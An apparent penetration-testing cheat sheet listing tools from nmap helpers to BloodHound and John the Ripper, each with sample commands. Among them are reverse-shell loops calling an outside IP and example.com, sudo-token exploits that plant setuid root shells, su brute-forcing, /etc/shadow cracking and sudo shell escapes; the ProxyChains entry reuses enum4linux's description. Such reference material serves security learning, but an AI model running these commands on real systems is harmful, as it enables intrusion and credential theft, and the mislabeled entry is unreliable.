Reference List
Tnmap.py – This program breaks a big network into many small segments to enable parallel scans, multi-hosts task share, and more [Link].
tnmap.py 10.0.0.0/8
SearchSploit – Simple way to search for vulnerabilities on a local copy of the exploit-db.com [Link]. Other sources of vulns/exploits at NIST Search Vulnerability Database [Link], Mitre CVE [Link], and CVE Program Mission [Link].
sudo apt install exploitdb -y searchsploit wordpress sudo -V | grep "Sudo ver" searchsploit "sudo 1.9.5p1"
suBruteForce – Full throttle to get access as a specific user [Link].
./suBF.sh -u username -w top12000.txt -t 0.7 -s 0.007
sudo_inject – Injects process that have valid sudo token and activate our own sudo token [Link].
Will create the binary activate_sudo_token in /tmp. You can use it to activate the sudo token in your session:
bash exploit.sh /tmp/activate_sudo_token sudo su
Will create a sh shell in /tmp owned by root with setuid:
bash exploit_v2.sh /tmp/sh -p
Will create a sudoers file that makes sudo tokens eternal and allows all users to use sudo:
bash exploit_v3.sh sudo su
Foremost – A forensics tool to recover files based on headers and footers from disk or image file [Link].
sudo apt install foremost foremost -t jpg,pdf -i image.dd foremost -t doc,xml -i /dev/sdb1
Zsteg – A Ruby application to detect and extract hidden data in image files [Link].
sudo gem install zsteg zsteg image.png
ExifTool – An application for reading and writing meta information in a wide variety of files [Link]. Official website [Link].
sudo apt install exiftool exiftool image.png exiftool -common image.jpg exiftool image.jpg | grep GPS exiftool -all= image.jpg
GDB – The GNU Project debugger, allows one to see what is going on ‘inside’ a program while it executes or what a program was ‘doing’ at the moment it crashed [Link]. Usually used with PEDA (Python Exploit Development Assistance for GDB), which colorizes and displays disassembly codes, registers, memory information during debugging, and adds extra commands [Link].
sudo apt install gdb gdb executable (gdb) run
SublimeText – A very sophisticated text editor for code and markup [Link].
wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo apt-key add - sudo apt-get install apt-transport-https echo "deb https://download.sublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list sudo apt-get update sudo apt-get install sublime-text subl script.sh
NCat – A NetCat version by NMAP that accepts SSL [Link].
while true; do sudo ncat --ssl -lv 53 ; done
while true; do ncat --ssl -v 174.88.217.186 53 -e /bin/bash; sleep 5 ; done
python3 -c 'import pty; pty.spawn("/bin/bash")'
PwnCat – A sophisticated bind and reverse shell handler with many features as well as a drop-in replacement or compatible complement to netcat, ncat or socat [Link].
pwncat -l -e '/bin/bash' 4444 -k pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1 pwncat -e '/bin/bash' example.com 4444 -u --ping-intvl 1
The first example will keep listening (blind) even after disconnect.
The second and third are reverse and reconnect if Ctrl+C interrupts it but the third works over UDP.
SeatBelt – Performs a number of security-oriented host-survey safety checks [Link].
Seatbelt.exe -group=all -full Seatbelt.exe -group=user Seatbelt.exe -group=system Seatbelt.exe -group=slack Seatbelt.exe -group=chromium Seatbelt.exe -group=chromium Seatbelt.exe -group=misc
GoBuster – A tool to brute-force and discover directories, files, and subdomains [Link]..
sudo apt install gobuster gobuster dir -e -t 50 -u http://example.com/ -w /usr/share/wordlists/dirb/common.txt gobuster dns -d example.com -w subdomains.txt --wildcard
The first example uses -w to inform the wordlist file, -u to inform the URL or domain, -e for expanded mode, and -t define the number of threads.
On the second example, it looks for subdomains using dns -d and –wildcard detects properly the existence of a wildcard (*.example.com).
SSHuttle – Creates a VPN over the SSH tunnel and allows pivoting into the network laterally [Link]. It does not require any installation or root access on the host machine, just SSHuttle on the client is necessary. Note that ICMP (ping) does not work over this VPN.
sudo apt-get install sshuttle -y sshuttle -r user@host 10.0.0.0/8 sshuttle --dns -vvr user@host 0/0
Use the argument -r to set the credentials to login into the host, followed by the network you want to reach over the VPN (192.168.0.0/16 in this example), –dns all the DNS requests will also be tunneled, and 0/0 informs that all the traffic must go through the VPN as well.
BloodHound – A GUI to reveal the hidden and often unintended relationships within an Active Directory environment. It can be used to easily gain a deeper understanding of privilege relationships between objects (like users and groups). [Link].
Run the most recent version of the collector file on the PowerShell of a Windows machine that is connected to an Active Directory:
.\AzureHound.ps1 OR .\SharpHound.exe
Then transfer the output to the machine where the BloodHound will analyze it.
It can be installed using the official tutorial [Link] or if you are using Kali just follow the commands:
sudo apt-get install bloodhound -y sudo neo4j console & bloodhound &
Go to the page http://localhost:7474/ and enter neo4j as user and password, then change them on the next page.
Use the credentials changed above to connect and import the acquired output files in to BloodHound.
Evil-WinRM – WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol [Link]. This app gives a Remote Power Shell prompt. It can run locally or in a docker container.
evil-winrm -i 10.0.0.1 -u user -p password
Armitage – A free GUI for Metasploit [Link]. See also the licensed GUI for Metasploit called Cobalt Strike at [Link].
sudo msfdb init sudo apt install armitage -y sudo armitage
FrameBuffer – It is not a tool but a technique to capture the physical video output and export it to a file to be virtualized or stored. It needs the resolution information to make it visible later.
cat /dev/fb0 > fb.raw cat /sys/class/graphics/fb0/virtual_size
Now use GIMP to visualize the file.
JohnTheRipper – Tool for crashing hashes [Link]. It is able to find out what kind of hash is being used and adjust the parameters for it automatically.
john single_password.txt john -w:password.lst user:pass.lst sudo john /etc/passwd /etc/shadow
58k English words list in upper and lower case [Link].
Tools attached to John:
sudo unshadow /etc/passwd /etc/shadow > unshadow.txt unique -v -inp=allwords.lst uniques.lst
ColabCat – Use Google Research Colab’s GPU resources to crack hashes with HashCat at [Link] and follow the steps. It is also possible to run John there.
!bash apt update apt install john echo "b50ac41ec20631c7b6be72f070d8ff67" > pass cat pass john pass
SMBMap – Lists share drives, permissions, shared contents, uploads/downloads, and even executes remote commands [Link].
smbmap -H 10.0.0.1 -R smbmap -u user -p password -H host
enum4linux – A combination of the Samba tools: smbclient, rpclient, net, and nmblookup used for enumeration [Link].
enum4linux.pl -v 10.0.0.1 enum4linux.pl -a 10.0.0.1 enum4linux.pl -r 10.0.0.1 enum4linux.pl -u user -p password -U 10.0.0.1
ProxyChains – A combination of the Samba tools: smbclient, rpclient, net, and nmblookup used for enumeration [Link].
proxychains nmap 10.0.0.1
Edit the configuration file /etc/proxychains4.conf and customize if necessary:
dynamic_chain #strict_chain chain_len = 2 proxy_dns [ProxyList] #socks5 127.0.0.1 9150 # would use Tor Network socks4 200.200.200.200 9050 # a customized proxy socks4 200.200.200.100 9050 # a customized proxy socks4 200.200.100.100 9050 # a customized proxy socks4 200.100.100.100 9050 # a customized proxy
A good source of proxies can be found at [Link].
In case you find the message “an existing sandbox was detected” on the terminal, issue the following command:
sudo firecfg --clean
HashID – Identifies the different types of hashes used to encrypt data and especially passwords [Link]. See also a web tool for the same purpose called TunnelsUp [Link].
pip install hashid hashid -mj '$2y$10$EtzcwxcVdq7D40GIStLA2u4mxfZfUctoD.fufB7NdAJgjq3ACy2Di' hashid file.txt
Axel – Axel is a multi thread Linux CLI download application [Link]. It works as a download accelerator for commands line interface.
axel -a -n 6 https://example.com/file.gz
Note: -a only shows the progress and -n 6 defines the number of threads.
GettingShell – Is is not a tool but a small collection of unexpected ways to get root access or shell.
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
Vim or Vi (command line text editor) or the application More (that used Vim) if run by root can get access to any file on the system and even start a shell:
- :e /etc/passwd
- open the desired file as the running user
- :sh
- get a shell as the running user
- :shell
- get a shell as the running user
- :set shell=/bin/bash
- used to set a non-default shell if necessary